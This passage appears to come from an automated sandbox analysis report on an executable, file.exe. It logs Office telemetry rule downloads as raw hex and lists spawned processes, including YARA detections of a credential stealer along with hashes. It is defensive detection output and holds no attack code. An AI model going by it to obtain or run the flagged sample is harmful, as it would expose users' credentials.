                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700500" V="1" DC="SM" EN="Office.Telemetry.Event.Office.PowerPoint" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenPowerPoint" S="Medium" /> <F T=


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                            142192.168.2.44997513.107.246.63443
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            2024-11-22 03:27:55 UTC192OUTGET /rules/rule702550v1s19.xml HTTP/1.1
                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                            2024-11-22 03:27:55 UTC515INHTTP/1.1 200 OK
                                                                                                                                                                                                            Date: Fri, 22 Nov 2024 03:27:55 GMT
                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                            Content-Length: 1378
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:27:53 GMT
                                                                                                                                                                                                            ETag: "0x8DC582BE584C214"
                                                                                                                                                                                                            x-ms-request-id: 36815d12-601e-0070-4763-3ba0c9000000
                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                            x-azure-ref: 20241122T032755Z-178bfbc474bpnd5vhC1NYC4vr4000000029g00000000nhps
                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                            X-Cache-Info: L1_T2
                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                            2024-11-22 03:27:55 UTC1378INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 35 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 65 72 73 6f 6e 61 6c 69 7a 61 74 69 6f 6e 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 50 65 72 73 6f 6e 61 6c 69 7a 61 74 69 6f 6e 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d
                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702550" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Personalization" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenPersonalization" S="Medium" />


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                            143192.168.2.44997413.107.246.63443
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            2024-11-22 03:27:55 UTC192OUTGET /rules/rule702551v1s19.xml HTTP/1.1
                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                            2024-11-22 03:27:55 UTC515INHTTP/1.1 200 OK
                                                                                                                                                                                                            Date: Fri, 22 Nov 2024 03:27:55 GMT
                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                            Content-Length: 1415
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:27:39 GMT
                                                                                                                                                                                                            ETag: "0x8DC582BDCE9703A"
                                                                                                                                                                                                            x-ms-request-id: 11fd19a1-001e-0046-3f80-3bda4b000000
                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                            x-azure-ref: 20241122T032755Z-174c587ffdfgcs66hC1TEB69cs00000000ug000000000umb
                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                            X-Cache-Info: L1_T2
                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                            2024-11-22 03:27:55 UTC1415INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 35 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 65 72 73 6f 6e 61 6c 69 7a 61 74 69 6f 6e 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e
                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702551" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Personalization.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenan


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                            144192.168.2.44997613.107.246.63443
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            2024-11-22 03:27:55 UTC192OUTGET /rules/rule701351v1s19.xml HTTP/1.1
                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                            2024-11-22 03:27:56 UTC515INHTTP/1.1 200 OK
                                                                                                                                                                                                            Date: Fri, 22 Nov 2024 03:27:55 GMT
                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                            Content-Length: 1407
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:27:55 GMT
                                                                                                                                                                                                            ETag: "0x8DC582BE687B46A"
                                                                                                                                                                                                            x-ms-request-id: 23fc118c-601e-0084-474e-3c6b3f000000
                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                            x-azure-ref: 20241122T032755Z-15b8b599d88hr8sfhC1TEBbca400000000t0000000007ace
                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                            X-Cache-Info: L1_T2
                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                            2024-11-22 03:27:56 UTC1407INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 33 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 65 72 66 6f 72 6d 61 6e 63 65 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b
                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701351" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Performance.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTok


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                            145192.168.2.44997713.107.246.63443
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            2024-11-22 03:27:56 UTC192OUTGET /rules/rule701350v1s19.xml HTTP/1.1
                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                            2024-11-22 03:27:56 UTC515INHTTP/1.1 200 OK
                                                                                                                                                                                                            Date: Fri, 22 Nov 2024 03:27:56 GMT
                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                            Content-Length: 1370
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:27:41 GMT
                                                                                                                                                                                                            ETag: "0x8DC582BDE62E0AB"
                                                                                                                                                                                                            x-ms-request-id: 0ac0d454-901e-0015-334f-3cb284000000
                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                            x-azure-ref: 20241122T032756Z-15b8b599d88z9sc7hC1TEBkr4w00000000w000000000n0sm
                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                            X-Cache-Info: L1_T2
                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                            2024-11-22 03:27:56 UTC1370INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 33 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 65 72 66 6f 72 6d 61 6e 63 65 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 50 65 72 66 6f 72 6d 61 6e 63 65 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20
                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701350" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Performance" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenPerformance" S="Medium" /> <F


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                            146192.168.2.44997813.107.246.63443
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            2024-11-22 03:27:56 UTC192OUTGET /rules/rule702151v1s19.xml HTTP/1.1
                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                            2024-11-22 03:27:56 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                            Date: Fri, 22 Nov 2024 03:27:56 GMT
                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                            Content-Length: 1397
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:27:46 GMT
                                                                                                                                                                                                            ETag: "0x8DC582BE156D2EE"
                                                                                                                                                                                                            x-ms-request-id: 1f0666f4-801e-007b-6865-3be7ab000000
                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                            x-azure-ref: 20241122T032756Z-178bfbc474bq2pr7hC1NYCkfgg00000002g000000000eezq
                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                            2024-11-22 03:27:56 UTC1397INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 31 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 65 6f 70 6c 65 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 50 65 6f
                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702151" V="1" DC="SM" EN="Office.Telemetry.Event.Office.People.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenPeo


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                            147192.168.2.44998013.107.246.63443
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            2024-11-22 03:27:57 UTC192OUTGET /rules/rule703001v1s19.xml HTTP/1.1
                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                            2024-11-22 03:27:58 UTC515INHTTP/1.1 200 OK
                                                                                                                                                                                                            Date: Fri, 22 Nov 2024 03:27:57 GMT
                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                            Content-Length: 1406
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:28:03 GMT
                                                                                                                                                                                                            ETag: "0x8DC582BEB16F27E"
                                                                                                                                                                                                            x-ms-request-id: e8ec328a-c01e-0049-1675-3cac27000000
                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                            x-azure-ref: 20241122T032757Z-174c587ffdf7t49mhC1TEB4qbg00000000s000000000e9mr
                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                            X-Cache-Info: L1_T2
                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                            2024-11-22 03:27:58 UTC1406INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 30 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 4f 75 74 6c 6f 6f 6b 2e 4d 61 63 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b
                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703001" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Outlook.Mac.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTok


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                            148192.168.2.44997913.107.246.63443
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            2024-11-22 03:27:57 UTC192OUTGET /rules/rule702150v1s19.xml HTTP/1.1
                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                            2024-11-22 03:27:58 UTC515INHTTP/1.1 200 OK
                                                                                                                                                                                                            Date: Fri, 22 Nov 2024 03:27:57 GMT
                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                            Content-Length: 1360
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:28:07 GMT
                                                                                                                                                                                                            ETag: "0x8DC582BEDC8193E"
                                                                                                                                                                                                            x-ms-request-id: c87fa586-301e-0052-7045-3c65d6000000
                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                            x-azure-ref: 20241122T032757Z-15b8b599d88s6mj9hC1TEBur3000000000r0000000007maz
                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                            X-Cache-Info: L1_T2
                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                            2024-11-22 03:27:58 UTC1360INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 31 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 65 6f 70 6c 65 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 50 65 6f 70 6c 65 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20
                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702150" V="1" DC="SM" EN="Office.Telemetry.Event.Office.People" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenPeople" S="Medium" /> <F T="2">


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                            149192.168.2.44998213.107.246.63443
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            2024-11-22 03:27:58 UTC192OUTGET /rules/rule700751v1s19.xml HTTP/1.1
                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                            2024-11-22 03:27:58 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                            Date: Fri, 22 Nov 2024 03:27:58 GMT
                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                            Content-Length: 1414
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:27:44 GMT
                                                                                                                                                                                                            ETag: "0x8DC582BE03B051D"
                                                                                                                                                                                                            x-ms-request-id: d9643c7c-a01e-0021-3e4f-3c814c000000
                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                            x-azure-ref: 20241122T032758Z-178bfbc474btrnf9hC1NYCb80g00000002p0000000000tyr
                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                            2024-11-22 03:27:58 UTC1414INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 37 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 4f 75 74 6c 6f 6f 6b 2e 44 65 73 6b 74 6f 70 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e
                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700751" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Outlook.Desktop.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenan


                                                                                                                                                                                                            Click to jump to process

                                                                                                                                                                                                            Click to jump to process

                                                                                                                                                                                                            Click to dive into process behavior distribution

                                                                                                                                                                                                            Click to jump to process

                                                                                                                                                                                                            Target ID:0
                                                                                                                                                                                                            Start time:22:25:54
                                                                                                                                                                                                            Start date:21/11/2024
                                                                                                                                                                                                            Path:C:\Users\user\Desktop\file.exe
                                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                                            Commandline:"C:\Users\user\Desktop\file.exe"
                                                                                                                                                                                                            Imagebase:0x240000
                                                                                                                                                                                                            File size:1'826'816 bytes
                                                                                                                                                                                                            MD5 hash:27FA50C74212925790649267140710F1
                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                            Yara matches:
                                                                                                                                                                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.1804050147.000000000125E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.1803965347.0000000001251000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.1804145488.0000000001261000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                            Target ID:4
                                                                                                                                                                                                            Start time:22:26:30
                                                                                                                                                                                                            Start date:21/11/2024
                                                                                                                                                                                                            Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                            Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=file.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0
                                                                                                                                                                                                            Imagebase:0x7ff76e190000
                                                                                                                                                                                                            File size:3'242'272 bytes
                                                                                                                                                                                                            MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                            Reputation:high
                                                                                                                                                                                                            Has exited:false

                                                                                                                                                                                                            Target ID:6
                                                                                                                                                                                                            Start time:22:26:31
                                                                                                                                                                                                            Start date:21/11/2024
                                                                                                                                                                                                            Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                            Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2084 --field-trial-handle=1932,i,6400708159271862020,17994335093903247733,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                                                                                                                                                                                                            Imagebase:0x7ff76e190000
                                                                                                                                                                                                            File size:3'242'272 bytes
                                                                                                                                                                                                            MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                            Reputation:high
                                                                                                                                                                                                            Has exited:false

                                                                                                                                                                                                            Target ID:7
                                                                                                                                                                                                            Start time:22:26:34
                                                                                                                                                                                                            Start date:21/11/2024
                                                                                                                                                                                                            Path:C:\Program Files\Google\Chrome\Application\chrome.exe
